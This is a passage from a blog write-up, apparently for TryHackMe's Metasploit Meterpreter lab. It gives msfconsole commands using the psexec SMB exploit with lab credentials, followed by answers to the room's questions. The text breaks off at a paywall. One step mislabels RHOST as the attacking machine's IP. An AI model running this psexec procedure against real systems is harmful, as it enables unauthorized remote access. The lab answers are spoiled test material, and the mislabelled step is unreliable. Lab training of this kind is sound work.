Metasploit: Meterpreter — TryHackme Simple Writeup

Simple TryHackme’s Metasploit: Meterpreter Writeup | Karthikeyan Nagaraj

Karthikeyan Nagaraj
InfoSec Write-ups

First Step is to connect to the TryHackMe’s Vpn or Open Attack Box and Start the Machine

  1. Open Terminal and type msfconsole
  2. Then use the Exploit as exploit/windows/smb/psexec
  3. Set the RHOST as your Attacking Machine IP
  4. Set the SMBUser as Ballen
  5. Set the SMBPass as Password1
  6. Finally type the run Command
msfconsole
use exploit/windows/smb/psexec
set SMBUser ballen
set SMBPass Password1
run

1. What is the computer name?

We have to use the command sysinfo to get information about the system

Ans: ACME-TEST

2. What is the target domain?

Ans: FLASH

3. What is the name of the share likely created by the user?

Now we have to use the post module ,so First we have to background the session

Create an account to read the full story.

The author made this story available to Medium members only.
If you’re new to Medium, create a new account to read this story on us.

Or, continue in mobile web

Already have an account? Sign in

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by Karthikeyan Nagaraj

Entrepreneur | Writer | Cyber Security Consultant | AI Researcher

Responses (1)

What are your thoughts?

nice one dudue best way to undarstandn